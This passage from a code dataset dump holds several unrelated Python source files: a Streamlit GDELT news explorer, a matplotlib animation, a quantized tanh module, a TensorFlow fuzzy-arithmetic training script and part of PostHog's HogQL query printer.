bar\n progress = st.sidebar.progress(0.0)\n\n def _progress_function(value):\n '''Wrapper to make the progress bar work with Vaex.'''\n progress.progress(value)\n return True\n\n # Reformat the date_range\n date_min = date_range[0].strftime('%Y-%m-%d')\n date_max = date_range[1].strftime('%Y-%m-%d')\n if date_min == '2014-02-18':\n date_min = None\n if date_max == '2022-04-02':\n date_max = None\n\n st.title('GDELT Actor Explorer')\n\n if len(codes) > 0:\n\n st.subheader('Actor types selected')\n st.markdown(get_actor_code_descriptions(codes))\n\n # Compute the filter\n filter = create_filter(codes, date_min, date_max)\n # Compute all relevant data needed for visualisation\n data = compute_data(filter=filter, binner_resolution=binner_resolution, progress_function=_progress_function)\n\n # The visualisation of the data starts here\n\n # Plot the global single value summary stats\n avg_tone, goldstein_scale, total_events, total_sources, total_articles, gdf, gdfc, actor_names = data\n\n st.subheader('Summary statistics')\n metric_cols = st.columns(5)\n metric_cols[0].metric(label='Events', value=human_format(total_events))\n metric_cols[1].metric(label='Articles', value=human_format(total_articles))\n metric_cols[2].metric(label='Sources', value=human_format(total_sources))\n metric_cols[3].metric(label='Avg. 
Tone', value=f'{avg_tone:.2f}')\n metric_cols[4].metric(label='Goldstein Scale', value=f'{goldstein_scale:.2f}')\n\n col_left, col_right = st.columns(2)\n col_left.subheader(f'Average Tone per {binner_resolution.lower()}')\n col_left.plotly_chart(create_line_plot(gdf, 'Date', 'mean_avg_tone', 'std_avg_tone'),\n use_container_width=True)\n\n col_right.subheader(f'Goldstein scale per {binner_resolution.lower()}')\n col_right.plotly_chart(create_line_plot(gdf, 'Date', 'mean_goldstein_scale', 'std_goldstein_scale'),\n use_container_width=True)\n\n st.subheader('Event statistics per Country')\n st.plotly_chart(create_world_map(gdfc), use_container_width=True)\n\n st.subheader('Actor names wordcloud')\n st.plotly_chart(create_wordcloud(actor_names), use_container_width=True)\n\n else:\n st.error('No actor codes selected. Please select at least one actor code.')\n st.stop()\n","repo_name":"vaexio/streamlit-600million-gdelt-news-articles","sub_path":"actors.py","file_name":"actors.py","file_ext":"py","file_size_in_byte":11747,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"35649336608","text":"# -*- coding: UTF-8 -*-\nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n# 更新する内容\ndef _update_plot(i, fig, im):\n rad = math.radians(i)\n\n # 前回のフレーム内容を一旦削除\n if len(im) > 0:\n im[0].remove()\n im.pop()\n\n im.append(plt.scatter(math.cos(rad), math.sin(rad)))\n\nfig = plt.figure()\n\n# グラフを中央に表示\nax = fig.add_subplot(1,1,1)\n\n# グラフの目盛範囲設定\nax.set_xlim([-1.5, 1.5])\nax.set_ylim([-1.5, 1.5])\n\nim = [] # フレーム更新の際に前回のプロットを削除するために用意\n\n# アニメーション作成\nani = animation.FuncAnimation(fig, _update_plot, fargs = (fig, im),\n frames = 360, interval = 1)\n\n# 表示\nplt.show()\n","repo_name":"ta-dadadada/particle_simulation","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72271410407","text":"import torch\nfrom changan_plugin_pytorch.march import March, get_march\nfrom changan_plugin_pytorch.nn import qat\n\nfrom .lut import LookUpTable\nfrom .multi_table_fit import MultiTableFit\n\n\nclass Tanh(torch.nn.Module):\n r\"\"\"\n x3/j3 quantized tanh accuracy is low in (-0.1, 0.1) interval\n j5 quantized tanh accuracy is low in (-0.01, 0.01) interval with\n recommeded usage: setting int16 input and output.\n \"\"\"\n _QAT_MODULE = qat.Tanh\n\n def __init__(self, lut):\n super(Tanh, self).__init__()\n self.lut = lut\n self.register_buffer(\"scale\", torch.tensor([1], dtype=torch.float32))\n\n def forward(self, data):\n return self.lut(data, self.scale)\n\n @classmethod\n def from_float(cls, mod):\n r\"\"\"Create a quantized module from a float module or qparams_dict\n\n Args: `mod` a float module\n \"\"\"\n assert type(mod) == cls._QAT_MODULE, (\n \"qat.\"\n + cls.__name__\n + \".from_float only works for \"\n + cls._FLOAT_MODULE.__name__\n )\n\n activation_post_process = mod.activation_post_process\n if get_march() in (March.BERNOULLI, March.BERNOULLI2):\n lut = LookUpTable(func=torch.tanh)\n else:\n # due to restrictive condition of int32 data range,\n # in linear fitting certain param will be clipped while slope\n # is near to zero, so here we set zero linear fitting interval.\n # use table and constant fit is enuogh to fit the tanh function\n lut = MultiTableFit(\n func=torch.tanh,\n dense_xmin=0.0,\n dense_xmax=2.0,\n sparse_xmin=2.0,\n sparse_xmax=5.0,\n 
left_line_xmin=0.0,\n left_line_xmax=0.0,\n right_line_xmin=5.0,\n right_line_xmax=5.0,\n out_type=activation_post_process.dtype,\n is_symmetric=True,\n symmetric_k=-1,\n )\n quantized_tanh = cls(lut)\n quantized_tanh.scale.copy_(activation_post_process.scale)\n return quantized_tanh\n","repo_name":"xingyun-xy/cap","sub_path":"changan_plugin_pytorch/nn/quantized/tanh.py","file_name":"tanh.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18685419198","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nimport random\nimport pickle\nimport os\nimport sys\n\n#All my CI code that i've written\nfrom SamsCI import *\n\n\nDATA_FOLDER = \"data/\"\n\n\nREGUALIZE = True if sys.argv[1] == \"reg\" else False\n\n\ndef s_round(a):\n return int((a * 1000) + 0.5) / 1000.0\n\ndef gen_10(bs,add_feature,op,wideValue=.001):\n samples = []\n labels = []\n fNumbers = []\n\n\n alpha = AlphaOps(op).alphaCuts\n\n #compute values\n for b in bs:\n a = s_round(max(0,b - wideValue))\n c = s_round(min(1,b + wideValue))\n b = s_round(b)\n fNumbers.append([a,b,b,c])\n\n #Compute pairs\n for A in fNumbers:\n for B in fNumbers:\n samples.append(add_feature + A + B)\n label = list(map(lambda x: min(1,max(0,x)),alpha([A,B])))\n labels.append(label)\n\n return samples,labels\n\n\ndef gen_full(bs,add_feature,op,wideValue=2):\n samples = []\n labels = []\n\n alpha = AlphaOps(op).alphaCuts\n\n for b1 in bs:\n\n for b2 in bs:\n\n\n A = list(map(s_round,[b1 - wideValue, b1, b1, b1 + wideValue]))\n B = list(map(s_round,[b2 - wideValue, b2, b2, b2 + wideValue]))\n\n\n label = list(map(s_round,alpha([A,B])))\n samples.append(add_feature + A + B)\n labels.append(label)\n\n return samples,labels\n\n\ndef generate_training(wideValue=2,op=\"add\",force=False,filename='gen_data',featureOp=False):\n\n f_op_map = {\n 'add':[0,0],\n 'sub':[1,0],\n 'mul':[0,1],\n 'div':[1,1]\n }\n\n\n if featureOp:\n add_feature = f_op_map[op]\n else:\n add_feature = []\n\n try:\n with open(DATA_FOLDER + filename + \"_\" + op + \"_\" + str(featureOp) + \".pickle\",'rb') as f:\n samples,labels = pickle.load(f)\n print(\"Reading: \" + filename + \"_\" + op + \"_\" + str(featureOp) + \".pickle\")\n\n except:\n print(\"Generating: \" + filename + \"_\" + op + \"_\" + str(featureOp) + \".pickle\")\n\n\n bs = random.sample(list(np.arange(0,1,.001)),500)\n\n\n samples,labels = gen_10(bs,add_feature,op)\n\n\n with open(DATA_FOLDER + filename + \"_\" + op + \"_\" + str(featureOp) + \".pickle\",'wb') as f:\n pickle.dump((samples,labels),f)\n\n return samples,labels\n\n\ndef create_combined(data):\n X = []\n y = []\n\n for el in data:\n X += el[0]\n y += el[1]\n\n\n combined = list(zip(X,y))\n random.shuffle(combined)\n\n X,y = zip(*combined)\n\n print(X[0])\n print(y[0])\n\n return X,y\n\n\nif sys.argv[2] == \"combined\":\n subs = generate_training(op='sub',featureOp=True)\n adds = generate_training(op='add',featureOp=True)\n X,y = create_combined([subs,adds])\nelif sys.argv[2] == \"combinedmul\":\n data1 = generate_training(op='sub',featureOp=True)\n data2 = generate_training(op='add',featureOp=True)\n data3 = generate_training(op='mul',featureOp=True)\n data4 = generate_training(op='div',featureOp=True)\n X,y = create_combined([data1,data2,data3,data4])\nelif sys.argv[2] == \"div\":\n X,y = 
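The multi-table fit above approximates tanh from lookup intervals of varying density; the core idea in miniature with a single uniform table (the grid size and range are assumptions):

import numpy as np

xs = np.linspace(0.0, 5.0, 257)   # uniform grid over the symmetric half-range
table = np.tanh(xs)               # precomputed values

def lut_tanh(x):
    # odd symmetry + linear interpolation; np.interp clamps the saturated tail
    x = np.asarray(x, dtype=float)
    return np.sign(x) * np.interp(np.abs(x), xs, table)

probe = np.linspace(-6.0, 6.0, 10001)
print(np.max(np.abs(lut_tanh(probe) - np.tanh(probe))))  # ~1e-4 worst case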
generate_training(op='div',featureOp=False)\nelif sys.argv[2] == \"mul\":\n X,y = generate_training(op='mul',featureOp=False)\nelif sys.argv[2] == \"sub\":\n X,y = generate_training(op='sub',featureOp=False)\nelse:\n X,y = generate_training(op='add',featureOp=False)\n\n\n\ntrain_x, test_x, train_y, test_y = train_test_split(X,y,test_size=.2,random_state = 1)\n\n\nn_nodes_hl1 = 20\nn_nodes_hl2 = 20\nn_nodes_hl3 = 20\n\nn_classes = 4\n\n\nx = tf.placeholder('float',[None,len(train_x[0])])\ny = tf.placeholder('float',[None,4])\n\nx = tf.placeholder('float')\ny = tf.placeholder('float')\n\nweights = {\n 'h1_layer': tf.Variable(tf.random_normal([len(train_x[0]),n_nodes_hl1])),\n 'h2_layer': tf.Variable(tf.random_normal([n_nodes_hl1,n_nodes_hl2])),\n 'output_layer': tf.Variable(tf.random_normal([n_nodes_hl2, n_classes]))\n}\n\nbiases = {\n 'h1_layer': tf.Variable(tf.random_normal([n_nodes_hl1])),\n 'h2_layer': tf.Variable(tf.random_normal([n_nodes_hl2])),\n 'output_layer': tf.Variable(tf.random_normal([n_classes]))\n}\n\ndef neural_net_model(data):\n\n l1 = tf.add(tf.matmul(data,weights['h1_layer']), biases['h1_layer'])\n l1 = tf.nn.sigmoid(l1)\n\n l2 = tf.add(tf.matmul(l1,weights['h2_layer']), biases['h2_layer'])\n l2 = tf.nn.sigmoid(l2)\n\n output = tf.add(tf.matmul(l2,weights['output_layer']), biases['output_layer'])\n\n return output\n\n\n\n\ndef train_network(x):\n pred = neural_net_model(x)\n cost = tf.reduce_sum(tf.pow(pred - y,2))/(len(train_y))\n\n\n beta = .01\n\n if REGUALIZE:\n cost = tf.reduce_mean(cost +\n beta*tf.nn.l2_loss(weights['h1_layer']) +\n beta*tf.nn.l2_loss(weights['h2_layer']) +\n beta*tf.nn.l2_loss(weights['output_layer']))\n\n\n file = File(sys.argv[1] + \"_\" + sys.argv[2] + \"_\" + sys.argv[3] + \"_log.csv\")\n saver = tf.train.Saver()\n\n optimizer = tf.train.AdamOptimizer().minimize(cost)\n\n\n\n n_epochs = 5000\n printer = 10\n\n errors = []\n\n with tf.Session() as sess:\n sess.run(tf.initialize_all_variables())\n\n\n\n try:\n with open(\"epoch.log\",\"rb\") as f:\n epoch = pickle.load(f)\n except:\n epoch = 0\n\n\n if epoch > 0:\n saver.restore(sess,\"./model_\" + sys.argv[1] + \"_\" + sys.argv[2] + \"_\" + sys.argv[3]+ \".ckpt\")\n\n\n test = [.432,.433,.433,.434,.443,.444,.444,.445]\n\n print(\"Starting: \" + sys.argv[1] + \"_\" + sys.argv[2]+ \"_\" + sys.argv[3])\n print(\"Dim: \",len(train_x))\n\n while epoch < n_epochs:\n\n\n _,c = sess.run([optimizer,cost],feed_dict = {x: train_x, y: train_y})\n\n\n\n\n #if epoch % printer == 0:\n #print(\"test: \",sess.run(pred,feed_dict={x:[test]}))\n #print(\"SOl: \",0.875, 0.877, 0.877, 0.879)\n\n preds = sess.run(pred, feed_dict={x:test_x})\n accuracy = getAccuarcy(preds,test_y)\n print(accuracy)\n file.writeA([c,accuracy])\n\n\n print(\"Epoch:\",epoch,\"completed out of:\", n_epochs, \"Loss:\", c)\n\n #save the epoch we are currently on\n with open(\"epoch.log\",\"wb\") as f:\n pickle.dump(epoch,f)\n #errors.append(c)\n saver.save(sess,\"model_\" + sys.argv[1] + \"_\" + sys.argv[2]+ \"_\" + sys.argv[3] + \".ckpt\")\n epoch += 1\n\n os.remove(\"epoch.log\")\n\n #print(sess.run(pred,feed_dict = {x:[test]}))\n\n\n\ndef getAccuarcy(preds,truths):\n prints = random.randint(0,len(preds))\n correct = 0\n i = 0\n\n for pred,truth in zip(preds,truths):\n\n pred = [ s_round(round(i,3)) for i in pred]\n truth = [ s_round(round(i,3)) for i in truth]\n\n if i == prints:\n print(\"Pred: \", pred)\n print(\"Truth: \",truth)\n #show_result(pred,truth)\n\n if pred == truth:\n correct += 1\n\n i += 1\n\n return (correct / len(preds)) 
def test_network():\n\n    pred = neural_net_model(x)\n\n    saver = tf.train.Saver()\n\n\n    with tf.Session() as sess:\n        sess.run(tf.global_variables_initializer())\n\n        saver.restore(sess,\"./first_run_tests/model_\" + sys.argv[1] + \"_\" + sys.argv[2] + \".ckpt\")\n\n\n        preds = sess.run(pred, feed_dict={x:test_x})\n\n        with open(sys.argv[1] + \"_\" + sys.argv[2] + \"_preds.pickle\",\"wb\") as f:\n            pickle.dump((preds,test_y),f)\n\n\n\n        #accuracy = getAccuracy(preds,test_y)\n        #print(accuracy)\n\n\n\n\nif __name__ == '__main__':\n\n    #train_network(x)\n    test_network()\n\n\n","repo_name":"samkreter/fuzzySetOperationNN","sub_path":"dnn.py","file_name":"dnn.py","file_ext":"py","file_size_in_byte":7611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39510939209","text":"import re\nfrom dataclasses import dataclass\nfrom datetime import datetime, date\nfrom difflib import get_close_matches\nfrom typing import List, Literal, Optional, Union, cast\nfrom uuid import UUID\n\nfrom posthog.hogql import ast\nfrom posthog.hogql.base import AST\nfrom posthog.hogql.constants import (\n    MAX_SELECT_RETURNED_ROWS,\n    HogQLGlobalSettings,\n)\nfrom posthog.hogql.functions import (\n    ADD_OR_NULL_DATETIME_FUNCTIONS,\n    HOGQL_CLICKHOUSE_FUNCTIONS,\n    FIRST_ARG_DATETIME_FUNCTIONS,\n    HOGQL_AGGREGATIONS,\n    HOGQL_POSTHOG_FUNCTIONS,\n)\nfrom posthog.hogql.context import HogQLContext\nfrom posthog.hogql.database.models import Table, FunctionCallTable, SavedQuery\nfrom posthog.hogql.database.database import create_hogql_database\nfrom posthog.hogql.database.s3_table import S3Table\nfrom posthog.hogql.errors import HogQLException\nfrom posthog.hogql.escape_sql import (\n    escape_clickhouse_identifier,\n    escape_clickhouse_string,\n    escape_hogql_identifier,\n    escape_hogql_string,\n)\nfrom posthog.hogql.functions.mapping import ALL_EXPOSED_FUNCTION_NAMES, validate_function_args, HOGQL_COMPARISON_MAPPING\nfrom posthog.hogql.resolver import ResolverException, resolve_types\nfrom posthog.hogql.resolver_utils import lookup_field_by_name\nfrom posthog.hogql.transforms.in_cohort import resolve_in_cohorts\nfrom posthog.hogql.transforms.lazy_tables import resolve_lazy_tables\nfrom posthog.hogql.transforms.property_types import resolve_property_types\nfrom posthog.hogql.visitor import Visitor, clone_expr\nfrom posthog.models.property import PropertyName, TableColumn\nfrom posthog.models.team.team import WeekStartDay\nfrom posthog.models.utils import UUIDT\nfrom posthog.schema import MaterializationMode\nfrom posthog.utils import PersonOnEventsMode\n\n\ndef team_id_guard_for_table(table_type: Union[ast.TableType, ast.TableAliasType], context: HogQLContext) -> ast.Expr:\n    \"\"\"Add a mandatory \"and(team_id, ...)\" filter around the expression.\"\"\"\n    if not context.team_id:\n        raise HogQLException(\"context.team_id not found\")\n\n    return ast.CompareOperation(\n        op=ast.CompareOperationOp.Eq,\n        left=ast.Field(chain=[\"team_id\"], type=ast.FieldType(name=\"team_id\", table_type=table_type)),\n        right=ast.Constant(value=context.team_id),\n        type=ast.BooleanType(),\n    )\n\n\ndef to_printed_hogql(query: ast.Expr, team_id: int) -> str:\n    \"\"\"Prints the HogQL query without mutating the node\"\"\"\n    return print_ast(\n        clone_expr(query),\n        dialect=\"hogql\",\n        context=HogQLContext(team_id=team_id, enable_select_queries=True),\n        pretty=True,\n    )\n\n\ndef print_ast(\n    node: ast.Expr,\n    context: HogQLContext,\n    dialect: Literal[\"hogql\", \"clickhouse\"],\n    stack: 
Optional[List[ast.SelectQuery]] = None,\n settings: Optional[HogQLGlobalSettings] = None,\n pretty: bool = False,\n) -> str:\n prepared_ast = prepare_ast_for_printing(node=node, context=context, dialect=dialect, stack=stack, settings=settings)\n return print_prepared_ast(\n node=prepared_ast,\n context=context,\n dialect=dialect,\n stack=stack,\n settings=settings,\n pretty=pretty,\n )\n\n\ndef prepare_ast_for_printing(\n node: ast.Expr,\n context: HogQLContext,\n dialect: Literal[\"hogql\", \"clickhouse\"],\n stack: Optional[List[ast.SelectQuery]] = None,\n settings: Optional[HogQLGlobalSettings] = None,\n) -> ast.Expr:\n with context.timings.measure(\"create_hogql_database\"):\n context.database = context.database or create_hogql_database(context.team_id, context.modifiers)\n\n with context.timings.measure(\"resolve_types\"):\n node = resolve_types(node, context, dialect=dialect, scopes=[node.type for node in stack] if stack else None)\n if context.modifiers.inCohortVia == \"leftjoin\":\n with context.timings.measure(\"resolve_in_cohorts\"):\n resolve_in_cohorts(node, dialect, stack, context)\n if dialect == \"clickhouse\":\n with context.timings.measure(\"resolve_property_types\"):\n node = resolve_property_types(node, context)\n with context.timings.measure(\"resolve_lazy_tables\"):\n resolve_lazy_tables(node, dialect, stack, context)\n\n # We support global query settings, and local subquery settings.\n # If the global query is a select query with settings, merge the two.\n if isinstance(node, ast.SelectQuery) and node.settings is not None and settings is not None:\n for key, value in node.settings.model_dump().items():\n if value is not None:\n settings.__setattr__(key, value)\n node.settings = None\n\n # We add a team_id guard right before printing. 
It's not a separate step here.\n return node\n\n\ndef print_prepared_ast(\n node: ast.Expr,\n context: HogQLContext,\n dialect: Literal[\"hogql\", \"clickhouse\"],\n stack: Optional[List[ast.SelectQuery]] = None,\n settings: Optional[HogQLGlobalSettings] = None,\n pretty: bool = False,\n) -> str:\n with context.timings.measure(\"printer\"):\n # _Printer also adds a team_id guard if printing clickhouse\n return _Printer(\n context=context,\n dialect=dialect,\n stack=stack or [],\n settings=settings,\n pretty=pretty,\n ).visit(node)\n\n\n@dataclass\nclass JoinExprResponse:\n printed_sql: str\n where: Optional[ast.Expr] = None\n\n\nclass _Printer(Visitor):\n # NOTE: Call \"print_ast()\", not this class directly.\n\n def __init__(\n self,\n context: HogQLContext,\n dialect: Literal[\"hogql\", \"clickhouse\"],\n stack: Optional[List[AST]] = None,\n settings: Optional[HogQLGlobalSettings] = None,\n pretty: bool = False,\n ):\n self.context = context\n self.dialect = dialect\n self.stack: List[AST] = stack or [] # Keep track of all traversed nodes.\n self.settings = settings\n self.pretty = pretty\n self._indent = -1\n self.tab_size = 4\n\n def indent(self, extra: int = 0):\n return \" \" * self.tab_size * (self._indent + extra)\n\n def visit(self, node: AST):\n self.stack.append(node)\n self._indent += 1\n response = super().visit(node)\n self._indent -= 1\n self.stack.pop()\n\n if len(self.stack) == 0 and self.dialect == \"clickhouse\" and self.settings:\n if not isinstance(node, ast.SelectQuery) and not isinstance(node, ast.SelectUnionQuery):\n raise HogQLException(\"Settings can only be applied to SELECT queries\")\n settings = self._print_settings(self.settings)\n if settings is not None:\n response += \" \" + settings\n\n return response\n\n def visit_select_union_query(self, node: ast.SelectUnionQuery):\n self._indent -= 1\n queries = [self.visit(expr) for expr in node.select_queries]\n if self.pretty:\n query = f\"\\n{self.indent(1)}UNION ALL\\n{self.indent(1)}\".join([query.strip() for query in queries])\n else:\n query = \" UNION ALL \".join(queries)\n self._indent += 1\n if len(self.stack) > 1:\n return f\"({query.strip()})\"\n return query\n\n def visit_select_query(self, node: ast.SelectQuery):\n if self.dialect == \"clickhouse\":\n if not self.context.enable_select_queries:\n raise HogQLException(\"Full SELECT queries are disabled if context.enable_select_queries is False\")\n if not self.context.team_id:\n raise HogQLException(\"Full SELECT queries are disabled if context.team_id is not set\")\n\n # if we are the first parsed node in the tree, or a child of a SelectUnionQuery, mark us as a top level query\n part_of_select_union = len(self.stack) >= 2 and isinstance(self.stack[-2], ast.SelectUnionQuery)\n is_top_level_query = len(self.stack) <= 1 or (len(self.stack) == 2 and part_of_select_union)\n\n # We will add extra clauses onto this from the joined tables\n where = node.where\n\n joined_tables = []\n next_join = node.select_from\n while isinstance(next_join, ast.JoinExpr):\n if next_join.type is None:\n if self.dialect == \"clickhouse\":\n raise HogQLException(\"Printing queries with a FROM clause is not permitted before type resolution\")\n\n visited_join = self.visit_join_expr(next_join)\n joined_tables.append(visited_join.printed_sql)\n\n # This is an expression we must add to the SELECT's WHERE clause to limit results, like the team ID guard.\n extra_where = visited_join.where\n if extra_where is None:\n pass\n elif isinstance(extra_where, ast.Expr):\n if where is None:\n 
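# No filter collected yet: adopt the join's constraint (e.g. the team_id guard) directly.\n                    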
where = extra_where\n elif isinstance(where, ast.And):\n where = ast.And(exprs=[extra_where] + where.exprs)\n else:\n where = ast.And(exprs=[extra_where, where])\n else:\n raise HogQLException(\n f\"Invalid where of type {type(extra_where).__name__} returned by join_expr\", node=visited_join.where\n )\n\n next_join = next_join.next_join\n\n if node.select:\n # Only for ClickHouse: Gather all visible aliases, and/or the last hidden alias for\n # each unique alias name. Then make the last hidden aliases visible.\n if self.dialect == \"clickhouse\":\n visible_aliases = {}\n for alias in reversed(node.select):\n if isinstance(alias, ast.Alias):\n if not visible_aliases.get(alias.alias, None) or not alias.hidden:\n visible_aliases[alias.alias] = alias\n\n columns = []\n for column in node.select:\n if isinstance(column, ast.Alias):\n # It's either a visible alias, or the last hidden alias for this name.\n if visible_aliases.get(column.alias) == column:\n if column.hidden:\n if (\n isinstance(column.expr, ast.Field)\n and isinstance(column.expr.type, ast.FieldType)\n and column.expr.type.name == column.alias\n ):\n # Hide the hidden alias only if it's a simple field,\n # and we're using the same name for the field and the alias\n # E.g. events.event AS event --> events.evnet.\n column = column.expr\n else:\n # Make the hidden alias visible\n column = cast(ast.Alias, clone_expr(column))\n column.hidden = False\n else:\n # Always print visible aliases.\n pass\n else:\n # This is not the alias for this unique alias name. Skip it.\n column = column.expr\n columns.append(self.visit(column))\n else:\n columns = [self.visit(column) for column in node.select]\n else:\n columns = [\"1\"]\n window = (\n \", \".join(\n [f\"{self._print_identifier(name)} AS ({self.visit(expr)})\" for name, expr in node.window_exprs.items()]\n )\n if node.window_exprs\n else None\n )\n prewhere = self.visit(node.prewhere) if node.prewhere else None\n where = self.visit(where) if where else None\n group_by = [self.visit(column) for column in node.group_by] if node.group_by else None\n having = self.visit(node.having) if node.having else None\n order_by = [self.visit(column) for column in node.order_by] if node.order_by else None\n\n array_join = \"\"\n if node.array_join_op is not None:\n if node.array_join_op not in (\n \"ARRAY JOIN\",\n \"LEFT ARRAY JOIN\",\n \"INNER ARRAY JOIN\",\n ):\n raise HogQLException(f\"Invalid ARRAY JOIN operation: {node.array_join_op}\")\n array_join = node.array_join_op\n if len(node.array_join_list) == 0:\n raise HogQLException(f\"Invalid ARRAY JOIN without an array\")\n array_join += f\" {', '.join(self.visit(expr) for expr in node.array_join_list)}\"\n\n space = f\"\\n{self.indent(1)}\" if self.pretty else \" \"\n comma = f\",\\n{self.indent(1)}\" if self.pretty else \", \"\n\n clauses = [\n f\"SELECT{space}{'DISTINCT ' if node.distinct else ''}{comma.join(columns)}\",\n f\"FROM{space}{' '.join(joined_tables)}\" if len(joined_tables) > 0 else None,\n array_join if array_join else None,\n f\"PREWHERE{space}\" + prewhere if prewhere else None,\n f\"WHERE{space}\" + where if where else None,\n f\"GROUP BY{space}{comma.join(group_by)}\" if group_by and len(group_by) > 0 else None,\n f\"HAVING{space}\" + having if having else None,\n f\"WINDOW{space}\" + window if window else None,\n f\"ORDER BY{space}{comma.join(order_by)}\" if order_by and len(order_by) > 0 else None,\n ]\n\n limit = node.limit\n if self.context.limit_top_select and is_top_level_query:\n if limit is not None:\n if 
isinstance(limit, ast.Constant) and isinstance(limit.value, int):\n limit.value = min(limit.value, MAX_SELECT_RETURNED_ROWS)\n else:\n limit = ast.Call(\n name=\"min2\",\n args=[ast.Constant(value=MAX_SELECT_RETURNED_ROWS), limit],\n )\n else:\n limit = ast.Constant(value=MAX_SELECT_RETURNED_ROWS)\n\n if limit is not None:\n clauses.append(f\"LIMIT {self.visit(limit)}\")\n if node.limit_with_ties:\n clauses.append(\"WITH TIES\")\n if node.offset is not None:\n clauses.append(f\"OFFSET {self.visit(node.offset)}\")\n if node.limit_by is not None:\n clauses.append(f\"BY {', '.join([self.visit(expr) for expr in node.limit_by])}\")\n\n if node.settings is not None and self.dialect == \"clickhouse\":\n settings = self._print_settings(node.settings)\n if settings is not None:\n clauses.append(settings)\n\n if self.pretty:\n response = \"\\n\".join([f\"{self.indent()}{clause}\" for clause in clauses if clause is not None])\n else:\n response = \" \".join([clause for clause in clauses if clause is not None])\n\n # If we are printing a SELECT subquery (not the first AST node we are visiting), wrap it in parentheses.\n if not part_of_select_union and not is_top_level_query:\n if self.pretty:\n response = f\"({response.strip()})\"\n else:\n response = f\"({response})\"\n\n return response\n\n def visit_join_expr(self, node: ast.JoinExpr) -> JoinExprResponse:\n # return constraints we must place on the select query\n extra_where: Optional[ast.Expr] = None\n\n join_strings = []\n\n if node.join_type is not None:\n join_strings.append(node.join_type)\n\n if isinstance(node.type, ast.TableAliasType) or isinstance(node.type, ast.TableType):\n table_type = node.type\n while isinstance(table_type, ast.TableAliasType):\n table_type = table_type.table_type\n\n if not isinstance(table_type, ast.TableType) and not isinstance(table_type, ast.LazyTableType):\n raise HogQLException(f\"Invalid table type {type(table_type).__name__} in join_expr\")\n\n # :IMPORTANT: This assures a \"team_id\" where clause is present on every selected table.\n # Skip function call tables like numbers(), s3(), etc.\n if (\n self.dialect == \"clickhouse\"\n and not isinstance(table_type.table, FunctionCallTable)\n and not isinstance(table_type.table, SavedQuery)\n ):\n extra_where = team_id_guard_for_table(node.type, self.context)\n\n if self.dialect == \"clickhouse\":\n sql = table_type.table.to_printed_clickhouse(self.context)\n\n # Edge case. 
If we are joining an s3 table, we must wrap it in a subquery for the join to work\n if isinstance(table_type.table, S3Table) and (\n node.next_join or node.join_type == \"JOIN\" or node.join_type == \"GLOBAL JOIN\"\n ):\n sql = f\"(SELECT * FROM {sql})\"\n else:\n sql = table_type.table.to_printed_hogql()\n\n if isinstance(table_type.table, FunctionCallTable) and not isinstance(table_type.table, S3Table):\n if node.table_args is None:\n raise HogQLException(f\"Table function '{table_type.table.name}' requires arguments\")\n\n if table_type.table.min_args is not None and (\n node.table_args is None or len(node.table_args) < table_type.table.min_args\n ):\n raise HogQLException(\n f\"Table function '{table_type.table.name}' requires at least {table_type.table.min_args} argument{'s' if table_type.table.min_args > 1 else ''}\"\n )\n if table_type.table.max_args is not None and (\n node.table_args is None or len(node.table_args) > table_type.table.max_args\n ):\n raise HogQLException(\n f\"Table function '{table_type.table.name}' requires at most {table_type.table.max_args} argument{'s' if table_type.table.max_args > 1 else ''}\"\n )\n if node.table_args is not None and len(node.table_args) > 0:\n sql = f\"{sql}({', '.join([self.visit(arg) for arg in node.table_args])})\"\n elif node.table_args is not None:\n raise HogQLException(f\"Table '{table_type.table.to_printed_hogql()}' does not accept arguments\")\n\n join_strings.append(sql)\n\n if isinstance(node.type, ast.TableAliasType) and node.alias is not None and node.alias != sql:\n join_strings.append(f\"AS {self._print_identifier(node.alias)}\")\n\n elif isinstance(node.type, ast.SelectQueryType):\n join_strings.append(self.visit(node.table))\n\n elif isinstance(node.type, ast.SelectUnionQueryType):\n join_strings.append(self.visit(node.table))\n\n elif isinstance(node.type, ast.SelectQueryAliasType) and node.alias is not None:\n join_strings.append(self.visit(node.table))\n join_strings.append(f\"AS {self._print_identifier(node.alias)}\")\n\n elif isinstance(node.type, ast.LazyTableType):\n if self.dialect == \"hogql\":\n join_strings.append(self._print_identifier(node.type.table.to_printed_hogql()))\n else:\n raise HogQLException(f\"Unexpected LazyTableType for: {node.type.table.to_printed_hogql()}\")\n else:\n raise HogQLException(\n f\"Only selecting from a table or a subquery is supported. 
Unexpected type: {node.type.__class__.__name__}\"\n )\n\n if node.table_final:\n join_strings.append(\"FINAL\")\n\n if node.sample is not None:\n sample_clause = self.visit_sample_expr(node.sample)\n if sample_clause is not None:\n join_strings.append(sample_clause)\n\n if node.constraint is not None:\n join_strings.append(f\"ON {self.visit(node.constraint)}\")\n\n return JoinExprResponse(printed_sql=\" \".join(join_strings), where=extra_where)\n\n def visit_join_constraint(self, node: ast.JoinConstraint):\n return self.visit(node.expr)\n\n def visit_arithmetic_operation(self, node: ast.ArithmeticOperation):\n if node.op == ast.ArithmeticOperationOp.Add:\n return f\"plus({self.visit(node.left)}, {self.visit(node.right)})\"\n elif node.op == ast.ArithmeticOperationOp.Sub:\n return f\"minus({self.visit(node.left)}, {self.visit(node.right)})\"\n elif node.op == ast.ArithmeticOperationOp.Mult:\n return f\"multiply({self.visit(node.left)}, {self.visit(node.right)})\"\n elif node.op == ast.ArithmeticOperationOp.Div:\n return f\"divide({self.visit(node.left)}, {self.visit(node.right)})\"\n elif node.op == ast.ArithmeticOperationOp.Mod:\n return f\"modulo({self.visit(node.left)}, {self.visit(node.right)})\"\n else:\n raise HogQLException(f\"Unknown ArithmeticOperationOp {node.op}\")\n\n def visit_and(self, node: ast.And):\n return f\"and({', '.join([self.visit(expr) for expr in node.exprs])})\"\n\n def visit_or(self, node: ast.Or):\n return f\"or({', '.join([self.visit(expr) for expr in node.exprs])})\"\n\n def 